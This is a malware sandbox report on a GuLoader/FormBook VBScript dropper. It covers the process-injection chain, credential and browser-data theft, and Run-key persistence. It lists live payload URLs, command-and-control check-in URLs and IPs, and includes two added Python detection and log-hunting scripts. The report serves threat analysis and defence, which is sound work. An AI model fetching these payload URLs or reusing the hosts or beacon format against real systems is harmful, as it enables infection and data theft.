Email Addresses | DNS Server | Domain Accounts | 11 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 411 Process Injection | 4 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 1 Registry Run Keys / Startup Folder | 1 Software Packing | NTDS | 21 Security Software Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 411 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior graph legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, language of the binary (Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other), Is malicious, Internet.

Behavior Graph ID: 1450445 | Sample: IMG-466573885783553Folketin... | Start date: 01/06/2024 | Architecture: WINDOWS | Score: 100

Process tree reconstructed from the graph (node numbers in parentheses; bracketed numbers are the graph's created-registry-value / created-file counts as shown):

Sample (2)
  Contacted: www.slamdrops.com (51), www.led-svitidla.eu (53), 6 other IPs or domains (55)
  Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures
  Started: wscript.exe (12) [1], wab.exe (15) [3 1], wab.exe (17) [1], rundll32.exe (19)

wscript.exe (12)
  Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
  Started: powershell.exe (21) [14 19]

powershell.exe (21)
  Network: ramirex.ro 188.215.50.15, port 443 (local ports 49700, 49707), WEBCLASSITRO, Romania
  Signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
  Started: powershell.exe (25) [17], conhost.exe (28), cmd.exe (30) [1]

powershell.exe (25)
  Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
  Started: wab.exe (32) [6], cmd.exe (35) [1], wab.exe (37)

wab.exe (32)
  Signatures: Maps a DLL or memory area into another process
  Injected: dczsDTwoOAPdxoSvtjazysDUwNBh.exe (39)

dczsDTwoOAPdxoSvtjazysDUwNBh.exe (39, injected)
  Signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
  Started: clip.exe (42) [1 13]

clip.exe (42)
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
  Injected: dczsDTwoOAPdxoSvtjazysDUwNBh.exe (45)
  Started: firefox.exe (49)

dczsDTwoOAPdxoSvtjazysDUwNBh.exe (45, injected)
  Network: led-svitidla.eu 37.235.104.9 (local ports 49711, 49712, 49713), SUPERNETWORK_CZ, Czech Republic; beldecor.net 193.37.145.73 (local ports 49715, 49716, 49717), RMI-FITECHFR, France; www.387mfyr.sbs 137.220.252.40, port 80 (local port 49710), BCPL-SGBGPNETGlobalASNSG, Singapore
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
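The chain above (script host to PowerShell with a very long command line, PowerShell hollowing wab.exe, and the Run-key entry pointing at wab.exe that appears in the timeline further down) is the kind of thing the endpoint telemetry should catch without any signature for the payload. The following is an added example of that detection logic, not part of the Joe Sandbox report: it runs a few rules over process-creation events and Run-key values. The events are constructed to mirror the graph, the expected-parent list, the command-line length threshold and the autorun watch-list are assumptions to tune per environment, and the PIDs reuse the graph's node numbers only for readability.

```python
"""Detection checks for the execution chain in the behavior graph above.

Added example, not part of the Joe Sandbox report. The events below are
constructed to mirror the graph (wscript.exe -> powershell.exe ->
powershell.exe -> wab.exe) and the Run-key entry in the timeline; they are
not real telemetry. Rule thresholds and the expected-parent list are
assumptions to tune per environment.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # executable basename (Sysmon EID 1 "Image")
    parent_image: str   # parent basename (Sysmon EID 1 "ParentImage")
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# wab.exe (Windows Contacts) is an interactive tool; anything but the desktop
# shell launching it is suspicious (assumed allow-list).
WAB_EXPECTED_PARENTS = {"explorer.exe"}
LONG_CMDLINE = 1000  # characters; assumption
# Autorun targets to flag; the sample persisted wab.exe under HKCU\...\Run.
AUTORUN_WATCHLIST = {"wab.exe"}


def check_process(ev: ProcEvent) -> List[str]:
    """Return the names of the rules a process-creation event trips."""
    hits: List[str] = []
    img, parent = ev.image.lower(), ev.parent_image.lower()
    if img in SHELLS and parent in SCRIPT_HOSTS:
        hits.append("script_host_spawns_shell")
    if img in {"powershell.exe", "pwsh.exe"} and len(ev.cmdline) >= LONG_CMDLINE:
        hits.append("very_long_powershell_cmdline")
    if img == "wab.exe" and parent not in WAB_EXPECTED_PARENTS:
        hits.append("wab_unusual_parent")
    if parent == "wab.exe" and img != "wab.exe":
        hits.append("wab_unusual_child")
    return hits


def image_basename(command: str) -> str:
    """Best-effort executable name from a Run-key command, quoted or not."""
    cmd = command.strip()
    if cmd.startswith('"'):
        cmd = cmd[1:].split('"', 1)[0]
    else:
        i = cmd.lower().find(".exe")
        cmd = cmd[: i + 4] if i >= 0 else cmd.split(" ", 1)[0]
    return cmd.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_autorun(value_name: str, command: str) -> List[str]:
    """Flag a Run-key value whose command launches a watch-listed binary."""
    if image_basename(command) in AUTORUN_WATCHLIST:
        return ["run_key_launches_watchlisted_binary"]
    return []


def triage(events: List[ProcEvent], autoruns: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Run all rules; keys are 'pid:<pid>:<image>' or 'run:<value name>'."""
    findings: Dict[str, List[str]] = {}
    for ev in events:
        hits = check_process(ev)
        if hits:
            findings[f"pid:{ev.pid}:{ev.image}"] = hits
    for name, cmd in autoruns:
        hits = check_autorun(name, cmd)
        if hits:
            findings[f"run:{name}"] = hits
    return findings


# Constructed events; PIDs reuse the graph's node numbers for readability.
EVENTS = [
    ProcEvent(12, "wscript.exe", "explorer.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs"'),
    ProcEvent(21, "powershell.exe", "wscript.exe",
              "powershell.exe -Command " + "$a=1;" * 200),   # stands in for the very long command line
    ProcEvent(25, "powershell.exe", "powershell.exe", "powershell.exe -NoProfile"),
    ProcEvent(32, "wab.exe", "powershell.exe", r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    ProcEvent(900, "wab.exe", "explorer.exe", r'"C:\Program Files (x86)\windows mail\wab.exe"'),  # benign control
]
AUTORUNS = [
    ("1RTLGNO0FD", r"C:\Program Files (x86)\windows mail\wab.exe"),  # value from the timeline
    ("OneDrive", r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),  # benign control
]

if __name__ == "__main__":
    for key, hits in triage(EVENTS, AUTORUNS).items():
        print(key, "->", ", ".join(hits))
```

The wab.exe rules deliberately ignore the child's command line: the graph shows wab.exe launched with no arguments of interest, and the hollowed image is only visible as the later injection and network activity, so parent and child relationships are the reliable signal.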

Antivirus, machine learning and genetic malware detection

Initial sample:
Source | Detection | Scanner | Label
IMG-466573885783553Folketingsmedlemmers.vbs | 13% | ReversingLabs | Script-WScript.Trojan.GuLoader
IMG-466573885783553Folketingsmedlemmers.vbs | 14% | Virustotal |

Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches

Domains:
Source | Detection | Scanner
beldecor.net | 1% | Virustotal
led-svitidla.eu | 0% | Virustotal
ramirex.ro | 0% | Virustotal
www.led-svitidla.eu | 0% | Virustotal
www.andywork.one | 0% | Virustotal
www.slamdrops.com | 0% | Virustotal

URLs:
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe

Note on the URL list: every entry here was carved from powershell.exe memory, and the pesterbdd.com, apache.org, github.com/Pester, contoso.com, nuget.org, aka.ms and schemas.xmlsoap.org strings are the manifest and template URLs of the Pester, PowerShellGet and PackageManagement modules bundled with Windows PowerShell plus a .NET claim-type constant. They show up in any PowerShell dump that loaded those modules; the 100% "malware" verdict on pesterbdd.com is a reputation-feed artifact and not an indicator from this sample. The actual network indicators for this analysis are the ramirex.ro download URLs and the three /abt9/ check-in hosts in the tables below.
Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.387mfyr.sbs | 137.220.252.40 | true | false | | unknown
beldecor.net | 193.37.145.73 | true | false | | unknown
led-svitidla.eu | 37.235.104.9 | true | false | | unknown
ramirex.ro | 188.215.50.15 | true | false | | unknown
www.beldecor.net | unknown | unknown | false | | unknown
www.led-svitidla.eu | unknown | unknown | false | | unknown
www.andywork.one | unknown | unknown | false | | unknown
www.slamdrops.com | unknown | unknown | false | | unknown

Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
https://ramirex.ro/Rutschebanes.qxd | false | | unknown
http://www.led-svitidla.eu/abt9/ | false | | unknown
http://www.led-svitidla.eu/abt9/?Of5HNz9=iV9adYjvPp7RuLwaP6BmForAyDRLfg4mpsRDBpobO1h4QpcDO6+h8uyV1/sip+su221s2KGGsEsC4t0dUTAnOg7+9cTY95M3z71wQoeHgy2DqTBwSPZzUbg36nzdDZOI6y7kx7FtYrhA&HvxX=KFLDJ | false | | unknown
http://www.beldecor.net/abt9/?Of5HNz9=U+tTJKHHkznvwAdOTVuKaX3FkVtJQL73z6Knbsq9f/vaKulnAbb7PLKV5/tS55IHZlIFY34dfjld794ib/iuaW0ctDHRV5MOwCy1+9JCA1F7uH49s/OETdfla7HVUoCSmFvZju33t//s&HvxX=KFLDJ | false | | unknown
https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.bin | false | | unknown
http://www.387mfyr.sbs/abt9/?Of5HNz9=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP6hUKp5Wb66wssc3rTHo+fACwEvPa+X6vTXJYKXAx7rcdiqsO+f3J/gP&HvxX=KFLDJ | false | | unknown
http://www.beldecor.net/abt9/ | false | | unknown

The "Malicious: false" column reflects reputation lookups only. Per the behavior graph, ramirex.ro serves the second stage (Rutschebanes.qxd, HtwvlcDSFcrAhhcHdD97.bin) to powershell.exe and wab.exe, and the three /abt9/ URLs are requested by the injected process that also carries the direct-syscall signature, so all of them are indicators for this sample regardless of their reputation score.
URLs found in process memory (strings may carry trailing bytes from the dump):
Name | Source | Malicious | URL Reputation | Reputation
https://ramirex.ro/Rutschebanes.qxdP | powershell.exe, 00000002.00000002.1781282776.0000020615787000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1892792593.00000206255D3000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmp | false | safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.1656812613.0000000007215000.00000004.00000020.00020000.00000000.sdmp | true | malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.1656812613.0000000007215000.00000004.00000020.00020000.00000000.sdmp | false | safe | unknown
https://go.micro | powershell.exe, 00000002.00000002.1781282776.00000206167A2000.00000004.00000800.00020000.00000000.sdmp | false | safe | unknown
https://contoso.com/License | powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmp | false | safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmp | false | safe | unknown
https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.binBestobs194.59.30.6/HtwvlcDSFcrAhhcHdD97.bin | wab.exe, 00000012.00000002.1865972215.0000000006970000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://ramirex.ro | powershell.exe, 00000002.00000002.1781282776.0000020617316000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.1656812613.0000000007215000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.bina | wab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ramirex.ro/Rutschebanes.qxdXR | powershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ramirex.ro/)6 | wab.exe, 00000012.00000002.1866014372.0000000006A18000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore6lB | powershell.exe, 0000000E.00000002.1650625908.00000000047C1000.00000004.00000800.00020000.00000000.sdmp | false | safe | unknown
https://contoso.com/ | powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmp | false | safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1892792593.00000206255D3000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmp | false | safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1781282776.0000020615568000.00000004.00000800.00020000.00000000.sdmp | false | safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1781282776.0000020615568000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.1650625908.00000000047C1000.00000004.00000800.00020000.00000000.sdmp | false | safe | unknown
https://ramirex.ro/ | wab.exe, 00000012.00000002.1866014372.0000000006A18000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ramirex.ro/u | wab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ramirex.ro | powershell.exe, 00000002.00000002.1781282776.0000020615787000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000002.00000002.1781282776.0000020616E42000.00000004.00000800.00020000.00000000.sdmp | false | | unknown

Worth noting from this table: the wab.exe string "...HtwvlcDSFcrAhhcHdD97.binBestobs194.59.30.6/HtwvlcDSFcrAhhcHdD97.bin" pairs the payload path with a second host, 194.59.30.6, that does not appear in the contacted-IP table of this run; treat it as a candidate fallback download location when building block-lists from this report.
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
137.220.252.40 | www.387mfyr.sbs | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | false
193.37.145.73 | beldecor.net | France | 16347 | RMI-FITECHFR | false
37.235.104.9 | led-svitidla.eu | Czech Republic | 39392 | SUPERNETWORK_CZ | false
188.215.50.15 | ramirex.ro | Romania | 34358 | WEBCLASSITRO | false
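The three check-in URLs in the tables above share one shape: plain HTTP, a short lowercase path segment (abt9) between two slashes, and exactly two query parameters, the first a long base64-alphabet blob and the second a short tag (KFLDJ), with the same path and tag reused across three unrelated hosts. That structure, rather than the hostnames, is what survives when the operators rotate domains (the related-sample context further down shows the same hosts with paths 8cgp, wu8v, f8eq and ve3w). The following is an added example of hunting proxy logs for that shape; it is not part of the Joe Sandbox report. The regex bounds are assumptions chosen to fit the values observed here, and the log lines are constructed for the demonstration, with the three real URLs copied from the table.

```python
"""Hunt proxy logs for check-in URLs shaped like the ones in the report above.

Added example, not part of the Joe Sandbox report. The shape is taken from
the report's own entries: http://www.<host>/<short path>/?<key>=<blob>&<key>=<tag>.
The log lines are constructed for the demonstration, not captured traffic;
the regex bounds are assumptions that fit the observed values.
"""
import re
from typing import Dict, List, NamedTuple, Optional, Set
from urllib.parse import urlsplit


class Beacon(NamedTuple):
    host: str
    path: str       # short path between the slashes, e.g. "abt9"
    key: str        # name of the first query parameter
    tag: str        # value of the second parameter, e.g. "KFLDJ"
    blob_len: int   # length of the encoded first value


_PATH = re.compile(r"^/([a-z0-9]{3,6})/$")       # observed: 4 chars (assumed range)
_BLOB = re.compile(r"^[A-Za-z0-9+/=]{60,}$")      # observed: >100 chars, base64 alphabet
_TAG = re.compile(r"^[A-Za-z0-9]{3,8}$")          # observed: "KFLDJ"


def classify(url: str) -> Optional[Beacon]:
    """Return a Beacon if the URL matches the check-in shape, else None."""
    parts = urlsplit(url)
    if parts.scheme != "http" or not parts.hostname:
        return None
    m = _PATH.match(parts.path)
    if not m:
        return None
    # Split by hand: parse_qs would turn '+' inside the blob into spaces.
    pairs = [p.split("=", 1) for p in parts.query.split("&")]
    if len(pairs) != 2 or any(len(p) != 2 for p in pairs):
        return None
    (key, blob), (_, tag) = pairs
    if not (_BLOB.match(blob) and _TAG.match(tag)):
        return None
    return Beacon(parts.hostname, m.group(1), key, tag, len(blob))


def hunt(log_lines: List[str]) -> Dict[str, List[Beacon]]:
    """Group matching requests by host. Line format (constructed): ts client method url status."""
    hits: Dict[str, List[Beacon]] = {}
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        beacon = classify(fields[3])
        if beacon:
            hits.setdefault(beacon.host, []).append(beacon)
    return hits


def campaign_paths(hits: Dict[str, List[Beacon]]) -> Set[str]:
    """Distinct path tokens; one token across several hosts is one server list."""
    return {b.path for beacons in hits.values() for b in beacons}


# Constructed proxy log; the three check-in URLs are copied from the report.
LOG = """\
2024-06-01T20:02:11Z 10.0.0.15 GET http://www.led-svitidla.eu/abt9/?Of5HNz9=iV9adYjvPp7RuLwaP6BmForAyDRLfg4mpsRDBpobO1h4QpcDO6+h8uyV1/sip+su221s2KGGsEsC4t0dUTAnOg7+9cTY95M3z71wQoeHgy2DqTBwSPZzUbg36nzdDZOI6y7kx7FtYrhA&HvxX=KFLDJ 200
2024-06-01T20:02:14Z 10.0.0.15 GET http://www.beldecor.net/abt9/?Of5HNz9=U+tTJKHHkznvwAdOTVuKaX3FkVtJQL73z6Knbsq9f/vaKulnAbb7PLKV5/tS55IHZlIFY34dfjld794ib/iuaW0ctDHRV5MOwCy1+9JCA1F7uH49s/OETdfla7HVUoCSmFvZju33t//s&HvxX=KFLDJ 200
2024-06-01T20:02:20Z 10.0.0.15 GET http://www.387mfyr.sbs/abt9/?Of5HNz9=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP6hUKp5Wb66wssc3rTHo+fACwEvPa+X6vTXJYKXAx7rcdiqsO+f3J/gP&HvxX=KFLDJ 200
2024-06-01T20:02:25Z 10.0.0.15 GET https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.bin 200
2024-06-01T20:03:01Z 10.0.0.22 GET http://example.com/abcd/?x=1&y=2 200
"""

if __name__ == "__main__":
    found = hunt(LOG.splitlines())
    for host, beacons in found.items():
        print(host, [(b.path, b.tag, b.blob_len) for b in beacons])
    print("paths:", campaign_paths(found))
```

A client that hits several hosts with the same path token and tag within seconds, as the injected process does here, is a stronger signal than any single match, so in practice group by client as well as by host before alerting.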
General analysis information

Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1450445
Start date and time: 2024-06-01 19:56:44 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: IMG-466573885783553Folketingsmedlemmers.vbs
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winVBS@21/8@6/4
EGA Information:
• Successful, ratio: 40%
HCA Information:
• Successful, ratio: 85%
• Number of executed functions: 100
• Number of non-executed functions: 262
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6600 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7668 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
Timeline:
Time | Type | Description
13:57:39 | API Interceptor | 132x Sleep call for process: powershell.exe modified
15:30:14 | API Interceptor | 216215x Sleep call for process: clip.exe modified
21:29:44 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value 1RTLGNO0FD = C:\Program Files (x86)\windows mail\wab.exe
21:29:52 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run, value 1RTLGNO0FD = C:\Program Files (x86)\windows mail\wab.exe
Joe Sandbox View: related analyses sharing an indicator with this sample. Every listed sample is detected as malicious; the threat names are Joe Sandbox's, and the context is the indicator the other analysis shared (C2 path for IP matches, IP for domain/ASN/fingerprint matches).

Matching IPs

137.220.252.40
• ZAM#U00d3WIENIE_NR.2405073.exe: DBatLoader, FormBook; context: www.387mfyr.sbs/8cgp/
• Company profile.pif.exe: FormBook, PureLog Stealer; context: www.387mfyr.sbs/wu8v/
• NdYuOgHbM9.exe: FormBook; context: www.387mfyr.sbs/wu8v/
• SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exe: FormBook; context: www.387mfyr.sbs/wu8v/
• COMPANY PROFILE.exe: FormBook, PureLog Stealer; context: www.387mfyr.sbs/wu8v/
• BM-FM_NR.24040718PDF.exe: FormBook, GuLoader; context: www.387mfyr.sbs/8cgp/

193.37.145.73
• IMG-466573885783553Folketingsmedlemmers.vbs: FormBook, GuLoader; context: www.beldecor.net/abt9/
• Vibrant Purchase Order 1624.exe: FormBook; context: www.jf-energiesubtil33.fr/f8eq/
• kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exe: FormBook; context: www.jf-energiesubtil33.fr/ve3w/
• Inv 070324.exe: FormBook, PureLog Stealer; context: www.jf-energiesubtil33.fr/f8eq/
• NHhH776.exe: FormBook; context: www.jf-energiesubtil33.fr/ve3w/

Matching domains

ramirex.ro
• MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat: FormBook, GuLoader, Remcos; context: 188.215.50.15
• IMG-466573885783553Folketingsmedlemmers.vbs: FormBook, GuLoader; context: 188.215.50.15
• IMG-35235235523525235252532535Selvfinansieret.vbs: GuLoader; context: 188.215.50.15

www.387mfyr.sbs
• MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat: FormBook, GuLoader, Remcos; context: 137.220.252.40
• Factura 02297-23042024.exe: FormBook, GuLoader; context: 137.220.252.40
• anebilledes.exe: FormBook, GuLoader; context: 137.220.252.40
• IMG-466573885783553Folketingsmedlemmers.vbs: FormBook, GuLoader; context: 137.220.252.40
• ZAM#U00d3WIENIE_NR.2405073.exe: DBatLoader, FormBook; context: 137.220.252.40
• Company profile.pif.exe: FormBook, PureLog Stealer; context: 137.220.252.40
• NdYuOgHbM9.exe: FormBook; context: 137.220.252.40
• SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exe: FormBook; context: 137.220.252.40
• COMPANY PROFILE.exe: FormBook, PureLog Stealer; context: 137.220.252.40
• DHL_ES567436735845755676678877988975877.vbs: FormBook, GuLoader, Remcos; context: 137.220.252.40

Matching ASNs

WEBCLASSITRO
• MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat: FormBook, GuLoader, Remcos; context: 188.215.50.15
• IMG-466573885783553Folketingsmedlemmers.vbs: FormBook, GuLoader; context: 188.215.50.15
• IMG-35235235523525235252532535Selvfinansieret.vbs: GuLoader; context: 188.215.50.15
• BM-FM_NR.24040718PDF.exe: FormBook, GuLoader; context: 37.251.143.215
• nOrden_de_compra.exe: AgentTesla, PureLog Stealer; context: 89.32.46.159
• Project_Offer_2024.exe: AgentTesla; context: 89.32.46.159
• ndHq.exe: AgentTesla; context: 89.32.46.159
• arm7-20240101-1250.elf: Mirai; context: 37.251.157.173
• MS Document.html: Phisher; context: 37.251.137.194
• 3m37SZRkdC.elf: Mirai; context: 37.251.157.145

BCPL-SGBGPNETGlobalASNSG
• MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat: FormBook, GuLoader, Remcos; context: 137.220.252.40
• http://spshoesx.top/: Unknown; context: 137.220.146.63
• http://login.aeosaen.top/: Unknown; context: 27.124.47.217
• IMG-466573885783553Folketingsmedlemmers.vbs: FormBook, GuLoader; context: 137.220.252.40
• x64.nn.elf: Mirai; context: 137.220.223.49
• PDF89gh ReUrgent Quotepdf.exe: FormBook; context: 1.32.254.242
• Product Listsd#U0334r#U0334o#U0334w#U0334..exe: FormBook; context: 1.32.254.242
• https://aeno.co.jp.yc-zg.com/aeon: Unknown; context: 137.220.217.132
• https://aeno.co.jp.slksg.com/aeon: Unknown; context: 137.220.217.132
• https://aeno.co.jp.xianchui.net/aeon: Unknown; context: 137.220.217.132

RMI-FITECHFR
• IMG-466573885783553Folketingsmedlemmers.vbs: FormBook, GuLoader; context: 193.37.145.73
• w5c8CHID77.exe: Unknown; context: 185.135.132.103
• sDcscN5fmS.exe: FormBook; context: 185.98.131.152
• PURCHASE ORDER.doc: FormBook; context: 185.98.131.152
• Vibrant Purchase Order 1624.exe: FormBook; context: 193.37.145.73
• p8OI6WMicj.elf: Mirai; context: 37.18.170.8
• s3vFuDz184.elf: Mirai; context: 62.102.238.253
• Company profile.pif.exe: FormBook, PureLog Stealer; context: 185.135.132.99
• NdYuOgHbM9.exe: FormBook; context: 185.135.132.99
• kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exe: FormBook; context: 193.37.145.73

SUPERNETWORK_CZ
• MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat: FormBook, GuLoader, Remcos; context: 37.235.104.9
• IMG-466573885783553Folketingsmedlemmers.vbs: FormBook, GuLoader; context: 37.235.104.9
• RFQ0240515.XLS.bat.exe: FormBook; context: 37.235.104.9
• https://filetransfer.io/data-package/LGjfkuMP/download: Unknown; context: 46.234.105.221
• x607DB0i08.exe: Pushdo; context: 88.86.118.82
• x7RlIzQDk1.exe: Unknown; context: 88.86.118.82
• EwK95WVtzI.exe: Pushdo; context: 88.86.118.82
• https://26355.wexbo.com/files/other/pcm_company.pdf: HTMLPhisher; context: 95.168.193.75
• CX17SY6xF6.exe: Pushdo; context: 88.86.118.82
• Planilhas.xlsx.com.exe: Unknown; context: 46.234.108.120

Matching JA3 fingerprint

3b5074b1b5d032e5620f69f9f700ff0e
• SWIFT 103 202405291545524610 290524.vbs: GuLoader, Remcos; context: 188.215.50.15
• ORDER STBK05047.vbe: AgentTesla, GuLoader; context: 188.215.50.15
